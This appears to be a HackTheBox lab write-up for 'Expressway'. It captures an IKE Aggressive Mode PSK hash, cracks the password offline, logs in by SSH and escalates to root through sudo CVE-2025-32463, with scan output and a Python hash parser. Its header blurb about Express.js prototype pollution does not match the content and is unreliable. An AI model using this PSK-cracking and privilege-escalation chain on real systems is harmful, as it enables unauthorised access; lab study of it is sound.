xsspresso
Web · Medium · Linux

HTB — Expressway

Express.js prototype pollution vulnerability leads to remote code execution via deserialization of a crafted payload.

September 27, 2025 · HackTheBox
#Prototype Pollution #Node.js #Deserialization #RCE

nmap

```sh
nmap -sC -sV -p- -Pn 10.10.11.87 -oN nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-22 01:03 EDT
Nmap scan report for 10.10.11.87
Host is up (0.043s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.92 seconds
```

udp/500

```sh
nmap -sU -sC -sV -p 500 10.10.11.87 -oN nmap_udp
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-22 01:18 EDT
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 10.10.11.87
Host is up (0.024s latency).

PORT    STATE SERVICE VERSION
500/udp open  isakmp?
| ike-version: 
|   attributes: 
|     XAUTH
|_    Dead Peer Detection v1.0
```
```sh
ike-scan 10.10.11.87
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87	Main Mode Handshake returned HDR=(CKY-R=09657c160d5e7219) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=09002689dfd6b712 (XAUTH) VID=afcad713... (Dead Peer Detection v1.0)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.030 seconds (33.87 hosts/sec).  1 returned handshake; 0 returned notify
```
```sh
ike-scan -A --pskcrack 10.10.11.87
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87	Aggressive Mode Handshake returned HDR=(CKY-R=51de2810614ea371) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad713... (Dead Peer Detection v1.0) Hash(20 bytes)

IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
336a9873c3802ed138307137358d0ebcc1f9fcfb8a09b8451ac4323f9b6ca44bc853c6ef8a70e0c8204bcd72515527100cc8e683893eb866f04bc55709a6a4e2971d6a421eaddf24f9a53a9c17c8f5d3af35e289ffce2e287026dca44348662f6b4ab9d252cc722835451ed93c69bc9fc5ce5b37e1c5b8ae353f8f72b68d56d8:296d201a4ef7e36b2e3c7fd56f8427eba008f32543faefb9d518e8a0870b7a1421f238d979b2548e81f97ffca5168ad5a8425bbd54bcbbe1aea2db86b855606258b0b478768d97b050137bfb2e73bf819ffefd287ddb726149b0647083417af7e7ba1732f0f1a5f8f568b1edbbe61fc6c56f1bb1899a1599f8fc889cc75f75a7:51de2810614ea371:a54a9e93c65df358:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:26cc72b50be5f6ce4b7777208511289ca250c995:1f2296c371aeeaf14f746c4946fb300f6856da800f89571c7e37a5f6c63c243a:64ca4c83231f882793bf4b8fd64dcd8908dfa7ab
Ending ike-scan 1.9.5: 1 hosts scanned in 0.022 seconds (45.51 hosts/sec).  1 returned handshake; 0 returned notify
```
 

ike_hash.txt

```sh
336a9873c3802ed138307137358d0ebcc1f9fcfb8a09b8451ac4323f9b6ca44bc853c6ef8a70e0c8204bcd72515527100cc8e683893eb866f04bc55709a6a4e2971d6a421eaddf24f9a53a9c17c8f5d3af35e289ffce2e287026dca44348662f6b4ab9d252cc722835451ed93c69bc9fc5ce5b37e1c5b8ae353f8f72b68d56d8:296d201a4ef7e36b2e3c7fd56f8427eba008f32543faefb9d518e8a0870b7a1421f238d979b2548e81f97ffca5168ad5a8425bbd54bcbbe1aea2db86b855606258b0b478768d97b050137bfb2e73bf819ffefd287ddb726149b0647083417af7e7ba1732f0f1a5f8f568b1edbbe61fc6c56f1bb1899a1599f8fc889cc75f75a7:51de2810614ea371:a54a9e93c65df358:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:26cc72b50be5f6ce4b7777208511289ca250c995:1f2296c371aeeaf14f746c4946fb300f6856da800f89571c7e37a5f6c63c243a:64ca4c83231f882793bf4b8fd64dcd8908dfa7ab
```
```sh
psk-crack -d /usr/share/wordlists/rockyou.txt ike_hash.txt
Starting psk-crack [ike-scan 1.9.5] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 64ca4c83231f882793bf4b8fd64dcd8908dfa7ab
Ending psk-crack: 8045040 iterations in 4.710 seconds (1707992.67 iterations/sec)
```
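As an added example that is not part of the original writeup, the Python below parses the ike-scan PSK parameter line saved to ike_hash.txt (field order is the header ike-scan prints: g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r), decodes the responder identity and walks the initiator's SA proposal, so the settings the responder accepted in transform 1 (3DES, SHA1, modp1024, PSK) can be read straight from the file. The constant tables are the RFC 2407/2409 values, limited to the ones that occur here plus a few common ones.

```python
# Added example, not from the writeup: explain the fields of an ike-scan --pskcrack line.
FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")
# ISAKMP/IKEv1 attribute values (RFC 2409 Appendix A, RFC 2407); partial tables.
ENC = {1: "DES", 5: "3DES", 7: "AES"}
HASH = {1: "MD5", 2: "SHA1"}
AUTH = {1: "PSK", 3: "RSA_SIG"}
GROUP = {1: "modp768", 2: "modp1024", 14: "modp2048"}
ID_TYPES = {1: "ID_IPV4_ADDR", 2: "ID_FQDN", 3: "ID_USER_FQDN"}
# The ike_hash.txt line from the writeup, copied verbatim.
IKE_HASH_LINE = "336a9873c3802ed138307137358d0ebcc1f9fcfb8a09b8451ac4323f9b6ca44bc853c6ef8a70e0c8204bcd72515527100cc8e683893eb866f04bc55709a6a4e2971d6a421eaddf24f9a53a9c17c8f5d3af35e289ffce2e287026dca44348662f6b4ab9d252cc722835451ed93c69bc9fc5ce5b37e1c5b8ae353f8f72b68d56d8:296d201a4ef7e36b2e3c7fd56f8427eba008f32543faefb9d518e8a0870b7a1421f238d979b2548e81f97ffca5168ad5a8425bbd54bcbbe1aea2db86b855606258b0b478768d97b050137bfb2e73bf819ffefd287ddb726149b0647083417af7e7ba1732f0f1a5f8f568b1edbbe61fc6c56f1bb1899a1599f8fc889cc75f75a7:51de2810614ea371:a54a9e93c65df358:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:26cc72b50be5f6ce4b7777208511289ca250c995:1f2296c371aeeaf14f746c4946fb300f6856da800f89571c7e37a5f6c63c243a:64ca4c83231f882793bf4b8fd64dcd8908dfa7ab"

def parse_psk_params(line):
    """Split the colon-separated line into named byte fields and check the fixed-size ones."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    f = {name: bytes.fromhex(hexval) for name, hexval in zip(FIELDS, parts)}
    if len(f["cky_r"]) != 8 or len(f["cky_i"]) != 8 or len(f["hash_r"]) != 20:
        raise ValueError("cookies must be 8 bytes and HASH_R 20 bytes (SHA1)")
    return f

def decode_identity(idir_b):
    """ID payload body: type(1) protocol(1) port(2), then the identity data (RFC 2407 4.6.2)."""
    return ID_TYPES.get(idir_b[0], f"type {idir_b[0]}"), idir_b[4:].decode("ascii", "replace")

def parse_sa_transforms(sai_b):
    """Walk SAi_b: DOI(4) situation(4), one proposal header, then its transform payloads."""
    off = 8                                   # skip DOI + situation
    spi_size, n_transforms = sai_b[off + 6], sai_b[off + 7]
    off += 8 + spi_size                       # proposal header is 8 bytes plus the SPI
    transforms = []
    for _ in range(n_transforms):
        end = off + int.from_bytes(sai_b[off + 2:off + 4], "big")  # generic payload length
        attrs, a = {}, off + 8                # skip generic header + num/id/reserved
        while a < end:
            af = int.from_bytes(sai_b[a:a + 2], "big")
            if af & 0x8000:                   # TV attribute: 2-byte value inline
                attrs[af & 0x7FFF] = int.from_bytes(sai_b[a + 2:a + 4], "big")
                a += 4
            else:                             # TLV attribute: 2-byte length, then value
                alen = int.from_bytes(sai_b[a + 2:a + 4], "big")
                attrs[af] = int.from_bytes(sai_b[a + 4:a + 4 + alen], "big")
                a += 4 + alen
        transforms.append({"num": sai_b[off + 4], "enc": ENC.get(attrs.get(1)),
                           "hash": HASH.get(attrs.get(2)), "auth": AUTH.get(attrs.get(3)),
                           "group": GROUP.get(attrs.get(4)), "life_seconds": attrs.get(12)})
        off = end
    return transforms
```

Every input to HASH_R except the PSK itself sits in this file, which is why a responder that answers Aggressive Mode with a dictionary PSK is effectively handing out an offline-crackable hash; requiring Main Mode or certificate authentication removes that exposure.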
```sh
ssh ike@10.10.11.87
The authenticity of host '10.10.11.87 (10.10.11.87)' can't be established.
ED25519 key fingerprint is SHA256:fZLjHktV7oXzFz9v3ylWFE4BS9rECyxSHdlLrfxRM8g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.87' (ED25519) to the list of known hosts.
ike@10.10.11.87's password:
Last login: Mon Sep 22 03:04:17 BST 2025 from 10.10.14.2 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Sep 22 06:55:23 2025 from 10.10.14.10
ike@expressway:~$ whoami
ike
```

user.txt

```sh
ike@expressway:~$ cat user.txt
a488f925...
```
```sh
ike@expressway:~$ ./root.sh
woot!
root@expressway:/# whoami
root
```

root.txt

CVE-2025-32463

  • https://github.com/KaiHT-Ladiant/CVE-2025-32463/blob/main/cve-2025-32463.sh
```sh
══════════╣ Sudo version
 https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version
Sudo version 1.9.17
```
 
```sh
root@expressway:/# cat /root/root.txt
14fbb821...
```